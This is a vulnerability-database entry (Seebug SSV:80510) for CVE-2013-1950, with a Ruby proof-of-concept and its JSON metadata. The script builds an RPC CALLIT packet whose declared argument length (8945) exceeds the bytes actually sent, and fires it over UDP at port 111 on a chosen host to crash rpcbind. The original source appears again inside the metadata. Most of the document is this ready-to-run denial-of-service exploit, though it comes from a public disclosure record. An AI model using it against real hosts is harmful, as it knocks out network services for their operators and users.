ID SSV:80510
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00
Description
No description provided by source.
#!/usr/bin/ruby
#
# rpcbind_udp_crash_poc.rb
# 07/15/2013
# Sean Verity <veritysr1980 [at] gmail.com>
# CVE 2013-1950
#
# rpcbind (CALLIT Procedure) UDP Crash PoC
# Affected Software Package: rpcbind-0.2.0-19
#
# Tested on:
# Fedora 17 (3.9.8-100.fc17.x86_64 #1 SMP)
# CentOS 6.3 Final (2.6.32-279.22.1.el6.x86_64 #1 SMP)
#
# rpcbind can be crashed by setting the argument length
# value > 8944 in an RPC CALLIT procedure request over UDP.
#
require 'socket'
# Print the command-line usage text to stderr and terminate the process
# with a non-zero exit status (Kernel#abort semantics: message, then exit 1).
def usage
  banner = "\nusage: ./rpcbind_udp_crash_poc.rb <target>\n\n"
  abort(banner)
end
# Entry point. With exactly one argument (the target host) the script builds a
# single ONC RPC v2 CALLIT request to the portmapper program and sends it as
# one UDP datagram to port 111; with any other argument count it prints usage
# and exits via `usage`.
#
# Wire layout: fourteen big-endian 32-bit words ('N' packing) followed by a
# 5-byte argument body. The declared Argument Length (8945) does not match the
# 5 bytes actually appended; per the header comment, a declared length > 8944
# is what triggers the crash, which suggests the affected rpcbind trusts the
# length field rather than the bytes received (inferred from the header, not
# verified here).
#
# Defensive notes: a CALLIT request whose declared argument length exceeds the
# datagram size is the detectable signature of this message, and the header
# names rpcbind-0.2.0-19 as the affected package (CVE 2013-1950). Only one
# datagram is sent, no reply is read, and the socket is never closed
# explicitly; it is reclaimed when the process exits.
if ARGV.length == 1
pkt = [rand(2**32)].pack('N') # XID: random 32-bit transaction id
pkt << [0].pack('N') # Message Type: CALL (0)
pkt << [2].pack('N') # RPC Version: 2
pkt << [100000].pack('N') # Program: Portmap (100000)
pkt << [2].pack('N') # Program Version: 2
pkt << [5].pack('N') # Procedure: CALLIT (5)
pkt << [0].pack('N') # Credentials Flavor: AUTH_NULL (0)
pkt << [0].pack('N') # Length: 0 (no credential body)
pkt << [0].pack('N') # Credentials Verifier: AUTH_NULL (0)
pkt << [0].pack('N') # Length: 0 (no verifier body)
pkt << [0].pack('N') # Program: Unknown (0) — CALLIT forwards to this program number
pkt << [1].pack('N') # Version: 1
pkt << [1].pack('N') # Procedure: 1
pkt << [8945].pack('N') # Argument Length: declared value exceeds the 5 bytes that follow
pkt << "crash" # Arguments: only 5 bytes are actually sent
# Unconnected UDP socket; send writes the whole packet as one datagram to the
# target's port 111 (the standard rpcbind/portmapper port). No response is read.
s = UDPSocket.new
s.send(pkt, 0, ARGV[0], 111)
else
usage
end
{"lastseen": "2017-11-19T15:25:29", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2013-1950"]}]}, "exploitation": null, "vulnersScore": 5.0}, "href": "https://www.seebug.org/vuldb/ssvid-80510", "references": [], "enchantments_done": [], "id": "SSV:80510", "title": "rpcbind (CALLIT Procedure) UDP Crash PoC", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 7, "sourceData": "\n #!/usr/bin/ruby\r\n#\r\n#\trpcbind_udp_crash_poc.rb\r\n#\t07/15/2013\r\n#\tSean Verity <veritysr1980 [at] gmail.com>\r\n#\tCVE 2013-1950\r\n#\r\n#\trpcbind (CALLIT Procedure) UDP Crash PoC\r\n#\tAffected Software Package: rpcbind-0.2.0-19\r\n#\r\n#\tTested on: \r\n#\tFedora 17 (3.9.8-100.fc17.x86_64 #1 SMP) \r\n#\tCentOS 6.3 Final (2.6.32-279.22.1.el6.x86_64 #1 SMP)\r\n#\r\n#\trpcbind can be crashed by setting the argument length \r\n#\tvalue > 8944 in an RPC CALLIT procedure request over UDP.\r\n#\r\n\r\nrequire 'socket'\r\n\r\ndef usage\r\n\tabort "\\nusage: ./rpcbind_udp_crash_poc.rb <target>\\n\\n"\r\nend\r\n\r\nif ARGV.length == 1\r\n\tpkt = [rand(2**32)].pack('N')\t# XID\r\n\tpkt << [0].pack('N')\t\t\t# Message Type: CALL (0)\r\n\tpkt << [2].pack('N')\t\t\t# RPC Version: 2\r\n\tpkt << [100000].pack('N')\t\t# Program: Portmap (100000)\r\n\tpkt << [2].pack('N')\t\t\t# Program Version: 2\r\n\tpkt << [5].pack('N')\t\t\t# Procedure: CALLIT (5)\r\n\tpkt << [0].pack('N')\t\t\t# Credentials Flavor: AUTH_NULL (0)\r\n\tpkt << [0].pack('N')\t\t\t# Length: 0\r\n\tpkt << [0].pack('N')\t\t\t# Credentials Verifier: AUTH_NULL (0)\r\n\tpkt << [0].pack('N')\t\t\t# Length: 0\r\n\tpkt << [0].pack('N')\t\t\t# Program: Unknown (0) \r\n\tpkt << [1].pack('N')\t\t\t# Version: 1\r\n\tpkt << 
[1].pack('N')\t\t\t# Procedure: 1\r\n\tpkt << [8945].pack('N')\t\t\t# Argument Length\r\n\tpkt << "crash"\t\t\t\t\t# Arguments\r\n\r\n\ts = UDPSocket.new\r\n\ts.send(pkt, 0, ARGV[0], 111)\r\nelse\r\n\tusage\r\nend\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-80510", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}
{}